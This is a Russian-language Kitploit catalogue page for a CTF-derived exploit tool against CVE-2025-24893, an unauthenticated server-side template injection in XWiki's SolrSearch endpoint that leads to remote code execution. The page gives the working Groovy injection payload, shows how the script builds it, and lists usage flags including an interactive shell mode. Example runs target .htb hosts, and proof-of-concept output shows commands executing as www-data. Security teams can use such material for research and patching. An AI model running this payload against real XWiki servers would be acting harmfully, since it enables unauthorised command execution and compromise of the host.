Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24893-XWiki-SSTI-RCE — CVE-2025-24893 – XWiki SSTI неаутентифицированный RCE эксплойт (HackTheBox CTF) | Kitploit
Инструменты/GitHubGitHub/rippsec/cve-2025-24893-xwiki-ssti-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на Проникновение
GitHubrippsec/cve-2025-24893-xwiki-ssti-rce

CVE-2025-24893-XWiki-SSTI-RCE

CVE-2025-24893 – XWiki SSTI неаутентифицированный RCE эксплойт (HackTheBox CTF)

Репозиторий
24 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24893 — XWiki SSTI Удаленное выполнение кода

Обзор

ПолеДетали
CVECVE-2025-24893
Программное обеспечениеXWiki
УязвимостьСерверная инъекция шаблонов (SSTI) → RCE
АутентификацияНе требуется
Оценка CVSSКритический
КонтекстОбнаружено во время CTF на HackTheBox

Описание

XWiki предоставляет конечную точку SolrSearch (/xwiki/bin/get/Main/SolrSearch), которая обрабатывает вводимые пользователем данные через шаблонизатор Groovy без санитизации. Неаутентифицированный злоумышленник может внедрить выражение Groovy через параметр запроса text, что приводит к удаленному выполнению кода на сервере.

Технические детали

Уязвимая конечная точка

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=<PAYLOAD>

Механизм инъекции

Параметр text встраивается непосредственно в контекст макроса XWiki и обрабатывается движком Groovy. Инъекция выходит из контекста шаблона с помощью }}} и открывает блок {{async}}{{groovy}}:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("<CMD>".execute().text){{/groovy}}{{/async}}

Вывод отражается в теле RSS-ответа и может быть извлечен с помощью регулярных выражений.

Структура полезной нагрузки

root@kitploit:~
payload = '}}}{{async async=false}}{{groovy}}println("' + command + '".execute().text){{/groovy}}{{/async}}'

Ответ в формате XML/RSS — вывод команды появляется между маркерами [}}} и ]</ с HTML-закодированными символами.

Использование

root@kitploit:~
python3 exploit.py -t <TARGET> [-p PORT] [-s] [-i | -c COMMAND]
ФлагОписание
-tЦелевой хост или IP
-pПорт (по умолчанию: 80)
-sИспользовать HTTPS
-iИнтерактивный режим оболочки
-cВыполнение одной команды
-vПодробный вывод

Примеры

root@kitploit:~
# Одиночная команда
python3 exploit.py -t wiki.target.htb -c "id"

# Интерактивная оболочка
python3 exploit.py -t wiki.target.htb -i

# HTTPS на пользовательском порту
python3 exploit.py -t wiki.target.htb -p 443 -s -i

Зависимости

root@kitploit:~
pip install requests termcolor

Подтверждение концепции

root@kitploit:~
$ python3 exploit.py -t wiki.editor.htb -c "id"
[*] Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ссылки

  • Официальное уведомление XWiki
  • Запись NVD
Скачать инструмент